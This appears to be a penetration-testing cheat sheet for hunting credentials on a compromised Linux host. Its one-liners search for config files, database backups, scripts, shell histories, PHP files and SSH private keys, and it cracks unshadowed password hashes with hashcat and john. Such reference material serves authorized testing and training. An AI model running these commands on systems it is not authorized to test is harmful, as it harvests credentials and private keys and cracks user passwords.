Linux Password Hunting
Common Password Attack on Linux Machine
Config Files Search
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done
Credentials in Configuration Files
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done
Database Backup Search
for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done
Search Notes/txt Files
find /home/* -type f -name "*.txt"
Search Scripts on Linux
for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done
Search Cronjob
cat /etc/crontab
ls -la /etc/cron.*/
Search SSH Private Key
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
File History
find / -type f -name "*history" 2>/dev/null
tail -n5 /home/*/.*_history*
Search Password in PHP Files
grep -iRl "password\|passwd" /var/www --include=*.php
Cracking Linux Credentials
# unshadow local creds
unshadow passwd.bak shadow.bak > unshadow.txt
# Perform Dictionary Attack
hashcat -m 1800 -a 0 unshadow.txt /usr/share/wordlists/rockyou.txt -o cracked_shadow
Take a look at the unshadow.txt file. The field after the username (with a number or letter between two dollar signs) is the one that identifies the hash type used. It could be one of the following:
$1$ is MD5
$2a$ is Blowfish
$2y$ is Blowfish
$5$ is SHA-256
$6$ is SHA-512
$y$ is yescrypt
For $y$, for example, you can use the command:
john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt unshadow.txt
Tools
Last updated
Was this helpful?